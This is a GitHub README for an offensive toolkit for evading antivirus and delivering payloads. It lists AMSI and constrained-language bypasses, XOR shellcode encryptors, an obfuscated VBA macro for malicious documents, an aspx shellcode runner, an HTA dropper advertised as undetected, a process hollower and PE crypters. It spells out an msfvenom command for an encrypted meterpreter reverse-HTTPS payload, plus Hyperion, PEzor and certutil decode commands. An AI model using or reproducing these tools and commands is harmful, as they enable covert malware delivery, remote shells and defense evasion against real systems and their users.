Skip to content

Latest commit

 

History

History
69 lines (68 loc) · 2.05 KB

README.md

File metadata and controls

69 lines (68 loc) · 2.05 KB

TOOLS:

  • Platform.sln => platform.exe
PE with bypasses - use with x86/shikata_ga_nai | x64/zutto_dekiru encoder + XOREncrypt.sln
  • XOREncrypt.sln => XOREncrypt.exe
A second layer shellcode XOR encoer.
  • holcrimson.sln => holcrimson.dll
Unamanged DLL for in memory loading - use with x86/shikata_ga_nai | x64/zutto_dekiru encoder + XOREncrypt.sln
  • Doc1.doc - example Doc1.doc from medium article.
  • VBA_XORencrypt.ps1 - Powershell script for encrypting 4 parts of VBA macro.
  • Platform.txt - PS script
1. AMSI bypass
2. Download DLL
3. Load DLL to memory.
4. Run DLL.
  • macro.vba - for Doc1.doc
Obfuscated VBA macro for docm / doc attack.
  • platform.aspx - for IIS webserver attack
Use with msfvenom encrypted generated shellcode + XOREncrypt.sln
  • platform.hta - dropper.
Use with obfuscated PE ShellCode Runner
Download to disk and run - this is undetected.
  • isma.txt - use "-arg=1".split for arguemnts parsing.
1. AMSI bypass
2. Download PE
3. Load PE to memory.
4. Run PE.
  • HOLLOW.sln => HOLLOW.exe - Process Hollower.
1. Generate encrypted shellcode
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=$ip LPORT=443 EXITFUNC=thread -f csharp --encrypt xor --encrypt-key w -o shell.cs
2. Place inside and compile it.
  • ConfuserEX.zip - for .NET PE obfuscation.
  • Hyperion.zip - Crypter for PE obfuscation.
hyperion.exe input.exe output.exe
bash PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=10 evil.exe -z 2
  • bypass-clm.exe - CLM Bypass => spawn PowerShell in current terminal.
  • clm_enc.txt - Same as bypass-clm.exe but base64 encoded with certutil and you can pass b64 encoded commands:
certutil -decode clm_enc.txt clm.exe
# Example of b64 below checks if the PowerShell run in FullLanguage
clm.exe "JABFAHgAZQBjAHUAdABpAG8AbgBDAG8AbgB0AGUAeAB0AC4AUwBlAHMAcwBpAG8AbgBTAHQAYQB0AGUALgBMAGEAbgBnAHUAYQBnAGUATQBvAGQAZQA="

SCORE